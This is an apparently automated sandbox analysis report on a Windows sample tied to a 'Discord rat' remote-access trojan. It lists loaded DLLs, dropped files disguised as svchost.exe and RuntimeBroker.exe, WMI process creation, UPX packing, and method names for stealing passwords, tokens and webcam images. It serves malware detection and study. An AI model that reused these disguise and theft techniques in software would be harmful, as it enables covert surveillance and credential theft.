                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAutomated click: OK
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeAutomated click: OK
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\Uninstall Information\cmd.exe
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\Uninstall Information\ebf1f9fa8afd6d
                                  Source: 87Bym0x4Fy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                  Source: 87Bym0x4Fy.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                                  Source: 87Bym0x4Fy.exeStatic file information: File size 22314496 > 1048576
                                  Source: 87Bym0x4Fy.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1547400
                                  Source: 87Bym0x4Fy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Source: Binary string: \??\C:\Windows\symbols\exe\Discord rat.pdb3+ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Build.exe, 0000000D.00000000.1756787728.0000000000B76000.00000002.00000001.01000000.0000000E.sdmp, Build.exe, 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmp, s.exe, 00000015.00000000.1819435912.0000000000583000.00000002.00000001.01000000.0000001B.sdmp, s.exe, 00000015.00000002.1899493574.0000000000583000.00000002.00000001.01000000.0000001B.sdmp, s.exe, 00000015.00000003.1830651243.000000000718F000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users\maxim\Desktop\Discord rat c#\Discord rat\obj\Release\Discord rat.pdb-F424491E3931}\InprocServer32" source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF3C000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb$ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: symbols\exe\Discord rat.pdbS source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: *indoC:\Windows\Discord rat.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\dll\System.pdb" source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbBAz source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: 8C:\Windows\Discord rat.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Users\user\AppData\Roaming\Discord rat.pdbi source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: *assembly\GAC_64C:\Users\user\AppData\Roaming\Discord rat.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\Discord rat.pdbpdbp.GAw source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: System.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbk*_ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: RuntimeBroker.exe, 00000005.00000003.1722658950.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmp, hacn.exe, 0000000F.00000003.1784627169.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1786292411.000001470368F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.2009594706.00007FFE01221000.00000002.00000001.01000000.00000017.sdmp
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.PDB source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\System.pdbCiV source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF72000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\symbols\exe\Discord rat.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: *pC:\Users\user\AppData\Roaming\RuntimeBroker2.0.PDBp source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000012.00000002.1997269204.00007FFDEFB6F000.00000002.00000001.01000000.00000016.sdmp
                                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF72000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\Windows\Discord rat.pdbpdbrat.pdb91 source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\Discord rat.pdb&0 source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb%+ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users\maxim\Desktop\Discord rat c#\Discord rat\obj\Release\Discord rat.pdb source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF2A000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: RuntimeBroker2.0.PDB? source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\exe\Discord rat.pdb+ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb&0 source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbe source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp

                                  Data Obfuscation

                                  barindex
                                  Source: RuntimeBroker2.0.exe.0.dr, Program.cs.Net Code: LoadDll System.Reflection.Assembly.Load(byte[])
                                  Source: RuntimeBroker2.0.exe.0.dr, Program.cs.Net Code: password
                                  Source: RuntimeBroker2.0.exe.0.dr, Program.cs.Net Code: webcampic
                                  Source: RuntimeBroker2.0.exe.0.dr, Program.cs.Net Code: select_cam
                                  Source: RuntimeBroker2.0.exe.0.dr, Program.cs.Net Code: get_cams
                                  Source: RuntimeBroker2.0.exe.0.dr, Program.cs.Net Code: get_tokens
                                  Source: RuntimeBroker2.0.exe.0.drStatic PE information: 0xD6D709DC [Mon Mar 20 18:56:28 2084 UTC]
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline"
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.cmdline"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline"
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.cmdline"
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeFile created: C:\ProgramData\Microsoft\__tmp_rar_sfx_access_check_6417140
                                  Source: select.pyd.5.drStatic PE information: real checksum: 0x0 should be: 0x927e
                                  Source: unicodedata.pyd.5.drStatic PE information: real checksum: 0x0 should be: 0x4d519
                                  Source: python310.dll.5.drStatic PE information: real checksum: 0x0 should be: 0x179482
                                  Source: _socket.pyd.5.drStatic PE information: real checksum: 0x0 should be: 0x16097
                                  Source: based.exe.13.drStatic PE information: real checksum: 0x5df94e should be: 0x5ec614
                                  Source: libcrypto-1_1.dll.5.drStatic PE information: real checksum: 0x0 should be: 0x118790
                                  Source: _bz2.pyd.5.drStatic PE information: real checksum: 0x0 should be: 0x190ae
                                  Source: _decimal.pyd.5.drStatic PE information: real checksum: 0x0 should be: 0x241ea
                                  Source: s.exe.15.drStatic PE information: real checksum: 0x0 should be: 0x62099a
                                  Source: _hashlib.pyd.5.drStatic PE information: real checksum: 0x0 should be: 0x14a50
                                  Source: _lzma.pyd.5.drStatic PE information: real checksum: 0x0 should be: 0x2099b
                                  Source: Build.exe.5.drStatic PE information: section name: .didat
                                  Source: VCRUNTIME140.dll.5.drStatic PE information: section name: _RDATA
                                  Source: hacn.exe.13.drStatic PE information: section name: _RDATA
                                  Source: VCRUNTIME140.dll.15.drStatic PE information: section name: _RDATA
                                  Source: libcrypto-1_1.dll.15.drStatic PE information: section name: .00cfg
                                  Source: python310.dll.15.drStatic PE information: section name: PyRuntim
                                  Source: s.exe.15.drStatic PE information: section name: .didat
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B78D2A5 pushad ; iretd 3_2_00007FFD9B78D2A6
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B8A0972 push E85E515Dh; ret 3_2_00007FFD9B8A09F9
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B97180C push esp; ret 3_2_00007FFD9B9719BB
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B976605 push esp; ret 3_2_00007FFD9B97662B
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B971411 push esp; ret 3_2_00007FFD9B971433
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B972E11 push esp; ret 3_2_00007FFD9B972E33
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B9753E0 push edx; ret 3_2_00007FFD9B9753E3
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B9715DD push esp; ret 3_2_00007FFD9B9715FB
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B9791EA push esp; ret 3_2_00007FFD9B9791EB
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B9717EA push esp; ret 3_2_00007FFD9B9717EB
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B9715FC push esp; ret 3_2_00007FFD9B9715FB
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B976053 push esp; ret 3_2_00007FFD9B9761B3
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B972E54 push esp; ret 3_2_00007FFD9B9730CB
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B972E54 push esp; ret 3_2_00007FFD9B97332B
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B978051 push edx; ret 3_2_00007FFD9B9780DB
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B977052 push ebx; ret 3_2_00007FFD9B977053
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B97364D push esp; ret 3_2_00007FFD9B973673
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B970B82 push edx; ret 3_2_00007FFD9B970B83
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B97797D push ebx; ret 3_2_00007FFD9B977A03
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B97738C push esp; ret 3_2_00007FFD9B97736B
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B972598 push esp; ret 3_2_00007FFD9B97259B
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B976D98 push edx; ret 3_2_00007FFD9B976D9B
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B978569 push esp; ret 3_2_00007FFD9B97858B
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B974BC2 push esp; ret 3_2_00007FFD9B974BC3
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B975FBD push esp; ret 3_2_00007FFD9B975FDB
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B9759CC push esp; ret 3_2_00007FFD9B9759CB
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B9739D1 push esp; ret 3_2_00007FFD9B9739F3
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B9761CD push esp; ret 3_2_00007FFD9B9761B3
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B970BDC push esp; ret 3_2_00007FFD9B970F23
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B9719DC push esp; ret 3_2_00007FFD9B971C3B
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B975FDC push esp; ret 3_2_00007FFD9B975FDB
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1

                                  Persistence and Installation Behavior

                                  barindex
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeProcess created: "C:\Users\user\AppData\Roaming\RuntimeBroker.exe"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76842\python310.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\ZlZjQqUm.logJump to dropped file
